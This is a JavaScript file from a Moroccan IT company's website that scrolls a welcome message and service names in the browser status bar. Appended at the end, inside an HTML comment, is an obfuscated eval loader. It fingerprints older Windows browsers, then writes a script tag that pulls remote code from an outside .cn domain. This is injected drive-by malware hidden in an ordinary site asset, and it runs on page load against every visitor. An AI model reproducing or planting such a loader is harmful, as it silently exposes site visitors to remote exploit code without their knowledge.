
<!-- Hide from old browsers

// All you have to do is put another text in the variable message.
// Don't forget to break all lines with a ^
// When you do not place a ^ at the end of all the message, the
// message will not repeat

message = "Bienvenue sur www.tccomaroc.com^" +
"Standards Telephoniques^" +
"Materiels Informatiques^" +
"Precablage et Maintenance^" +
"Solutions Informatiques^" +
"^"
scrollSpeed = 25
lineDelay = 1500

// Do not change the text below //

txt = ""

function scrollText(pos) {
if (message.charAt(pos) != '^') {
txt = txt + message.charAt(pos)
status = txt
pauze = scrollSpeed
}
else {
pauze = lineDelay
txt = ""
if (pos == message.length-1) pos = -1
}
pos++
setTimeout("scrollText('"+pos+"')",pauze)
}

// Unhide -->
scrollText(0)

<!-- 
(function(y6e){var obUG='var,20a,3d,22Scr,69ptEngi,6ee,22,2c,62,3d,22V,65rsion(),2b,22,2cj,3d,22,22,2cu,3dnav,69,67at,6fr,2euserAge,6et,3bif((u,2ei,6e,64,65xOf(,22C,68rome,22),3c0,29,26,26(u,2einde,78O,66(,22Win,22),3e0,29,26,26(u,2ei,6e,64ex,4f,66(,22NT,20,36,22,29,3c0),26,26(docum,65n,74,2eco,6fk,69e,2ein,64exO,66(,22miek,3d1,22),3c,30,29,26,26(typeof(,7ar,76,7ats),21,3dtypeof(,22,41,22),29),7bzrvzts,3d,22A,22,3beva,6c,28,22if(win,64ow,2e,22+a+,22)j,3dj+,22+a,2b,22Ma,6aor,22+,62+a+,22Min,6fr,22,2bb+a+,22,42u,69ld,22+,62+,22,6a,3b,22),3bdo,63u,6de,6et,2e,77rite,28,22,3c,73cript,20sr,63,3d,2f,2fma,22+,22rt,75z,2e,63n,2fv,69d,2f,3fid,3d,22,2b,6a+,22,3e,3c,5c,2fscri,70t,3e,22),3b,7d';eval(unescape(obUG.replace(y6e,'%')))})(/\,/g);
 -->